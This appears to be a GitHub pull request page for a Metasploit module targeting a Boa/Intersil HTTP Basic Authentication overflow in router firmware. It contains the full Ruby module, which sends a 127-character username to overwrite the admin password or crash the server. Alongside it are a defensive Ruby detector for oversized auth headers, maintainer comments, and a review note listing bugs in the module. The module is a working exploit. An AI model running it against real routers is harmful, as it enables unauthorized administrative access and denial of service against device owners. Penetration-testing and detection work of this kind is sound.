
Boa HTTPd Basic Authentication Overflow #453

Closed
wants to merge 9 commits into from

2 participants

@mdietz94

Boa HTTP Server 0.93.x - 0.94.11 built with Intersil (i.e. common routers) allows denial of service or possibly authentication bypass via a Basic Authentication header with a user string greater than 127 characters. You must set the request URI to the directory that requires basic authentication. Depending on the version of the server either the administrator password will be overwritten in memory or the web server will be shut down.
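A defender-side check for the condition described above (a Basic Authorization header whose decoded user string exceeds 127 characters), written here as an added Ruby example; it is not part of the Metasploit module or this pull request, and the sample requests are constructed.

```ruby
require 'base64'

# Threshold from the advisory: a Basic-auth username longer than
# 127 characters triggers the Intersil/Boa bug.
MAX_SAFE_USER_LEN = 127

# Return the decoded Basic-auth username from one raw HTTP request
# (headers only), or nil if there is no Basic Authorization header
# or its value is not valid base64.
def basic_auth_user(raw_request)
  raw_request.each_line do |line|
    name, value = line.chomp.split(':', 2)
    next unless name && name.strip.casecmp('Authorization').zero?
    scheme, token = value.to_s.strip.split(/\s+/, 2)
    next unless scheme && scheme.casecmp('Basic').zero? && token
    begin
      decoded = Base64.strict_decode64(token)
    rescue ArgumentError
      return nil # malformed token: nothing to measure
    end
    user, _pass = decoded.split(':', 2)
    return user.to_s
  end
  nil
end

# Flag a request whose Basic-auth username exceeds the safe length.
# Returns { :flagged => bool, :user_len => bytes } so a caller can log it.
def oversized_basic_auth?(raw_request)
  user = basic_auth_user(raw_request)
  return { :flagged => false, :user_len => 0 } if user.nil?
  { :flagged => user.bytesize > MAX_SAFE_USER_LEN, :user_len => user.bytesize }
end

# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = "GET /admin/ HTTP/1.1\r\nHost: router\r\n" \
  "Authorization: Basic #{Base64.strict_encode64('admin:pass')}\r\n\r\n"
OVERSIZED_REQUEST = "GET /admin/ HTTP/1.1\r\nHost: router\r\n" \
  "Authorization: Basic #{Base64.strict_encode64(('A' * 128) + ':pass')}\r\n\r\n"

if __FILE__ == $0
  [BENIGN_REQUEST, OVERSIZED_REQUEST].each { |req| puts oversized_basic_auth?(req).inspect }
end
```

The same function can be run over reassembled requests from a capture or a reverse proxy log to alert on the overflow attempt before it reaches a Boa/Intersil device.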

@wchen-r7
Collaborator

Hi there,

Could you please run msftidy.rb on your module? It will tell you which line should be corrected. Also, please make sure you're using hard tabs instead of spaces for indentation. You're using spaces mostly. When you're done, please remember to do another push for this branch.

Thanks.

@wchen-r7
Collaborator

How do you configure basic auth for BOA? I see that there's a send_r_unauthorized() function defined in the source, but it's actually not used anywhere. This web server dev work looks incomplete.

@mdietz94

The actual vulnerability is not inside Boa, but inside Intersil (a firmware boa frequently runs on) that is used for basic authentication by boa servers. It is used frequently on routers and the like. The page for Intersil is http://isl3893.sourceforge.net/ . If you are having problems testing it I can post some packet captures or something.

@wchen-r7
Collaborator

Actually, yeah, a pcap would be great! Could you please e-mail it to msfdev[at]metasploit.com? Thanks!

@mdietz94

Sounds great, I'm out of town and won't be back until Friday, so I should be able to send you the pcap file over the weekend.

@wchen-r7
Collaborator

Wonderful, thanks! Holding it in the untested branch (aka the incomplete branch) for now, and then I'll move it to master once I get the pcap.

Cheers!

@wchen-r7
Collaborator

Placed it in here for now:
https://github.com/rapid7/metasploit-framework/blob/unstable/unstable-modules/auxiliary/boa_auth_dos.rb

Will reopen this weekend. Thanks again!

@wchen-r7 wchen-r7 closed this
@wchen-r7 wchen-r7 reopened this
@wchen-r7
Collaborator

Got a pcap. Reopened.

@wchen-r7 wchen-r7 referenced this pull request from a commit in wchen-r7/metasploit-framework
@sinn3r sinn3r Add Intersil HTTP Basic auth pass reset (originally #453)
The modified version of pull request #453. This addresses a couple
of things including:
* Change the description to better explain what the vulnerability is.
  The advisory focuses the problem as an auth bypass, not DoS,
  although it can end up dosing the server.
* The title and filename are changed as a result of matching that
  advisory's description.
* Use 'TARGETURI' option instead of 'URI'.
* The reset attempt needs to check if the directory actually has
  401 in place, otherwise this may result in a false positive.
* The last HTTP request needs to check a possible nil return value.
* More verbose outputs.
e72303a
@wchen-r7
Collaborator

Committed as #453: e72303a

@wchen-r7 wchen-r7 closed this
Commits on Jun 6, 2012
  1. @mdietz94

    added Boa HTTPd DoS

    mdietz94 authored
  2. @mdietz94

    fixed description

    mdietz94 authored
Commits on Jun 7, 2012
  1. @mdietz94

    realized ranking was only for exploits, added output to aid with checking whether or not the password was changed or denial of service was achieved. also added some error handling

    mdietz94 authored
  3. @mdietz94
  4. @mdietz94

    whitespace cleanup

    mdietz94 authored
  5. @mdietz94
  6. @mdietz94
Commits on Jun 8, 2012
  1. @mdietz94
Showing with 99 additions and 0 deletions.
  1. +99 −0 modules/auxiliary/dos/http/boa_auth_dos.rb
99 modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -0,0 +1,99 @@
+##
+# $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Boa HTTPd Basic Authentication Overflow',
+ 'Description' =>
+ %q{
+ The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+ allows denial of service or possibly authentication bypass
+ via a Basic Authentication header with a user string greater than 127 characters. You must set
+ the request URI to the directory that requires basic authentication.
+ },
+ 'Author' =>
+ [
+ 'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+ 'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+ 'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
+ ],
+ 'DisclosureDate' => 'Sep 10 2007'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('URI', [ true, "The request URI", '/']),
+ OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
+ ], self.class)
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri'=>'/',
+ 'method'=>'GET'
+ })
+ if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+ print_status("Boa Version Detected: #{m[1]}")
+ return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+ return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+ return Exploit::CheckCode::Vulnerable
+ else
+ print_status("Not a Boa Server!")
+ return Exploit::CheckCode::Safe # not a boa server
+ end
+ rescue Rex::ConnectionRefused
+ print_error("Connection refused by server.")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ if check == Exploit::CheckCode::Vulnerable
+ datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
+ datastore['BasicAuthPass'] = datastore['PASSWORD']
+ res = send_request_cgi({
+ 'uri'=> datastore['URI'],
+ 'method'=>'GET'
+ })
+ if (res != nil)
+ print_status("Server still operational... checking to see if password has been overwritten.")
+ datastore['BasicAuthUser'] = 'admin'
+ res = send_request_cgi({
+ 'uri'=>datastore['URI'],
+ 'method'=>'GET'
+ })
+ if (res.code == 200)
+ print_status("Access successful with admin:#{datastore['PASSWORD']}")
+ elsif (res.code != 401)
+ print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
+ else
+ print_status("Access forbidden, this module has failed.")
+ end
+ else
+ print_status("Denial of Service has succeeded.")
+ end
+ end
+ end
+end
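Review bot: the second request in `run` is followed by `if (res.code == 200)` with no nil guard, so when the server has died by then (one of the two outcomes the module itself expects) this raises NoMethodError instead of reporting the DoS; add `if res.nil?` before reading `res.code`, as is already done for the first request. Nothing confirms that `datastore['URI']` actually answers 401 before the overflow request is sent, so a 200 from an unprotected path is reported as "Access successful with admin:..." (a false positive); request the URI without credentials first and bail out unless it returns 401. The version test in `check` only inspects characters 0 and 3 of the banner, so 0.94.13 or 0.94.14 is classified Vulnerable although the description bounds the affected range at 0.94.11; compare the parsed version properly. Minor: "extention" in the description should be "extension", `'URI'` should follow the framework's `TARGETURI` convention, and the file is indented with spaces rather than the hard tabs msftidy.rb expects.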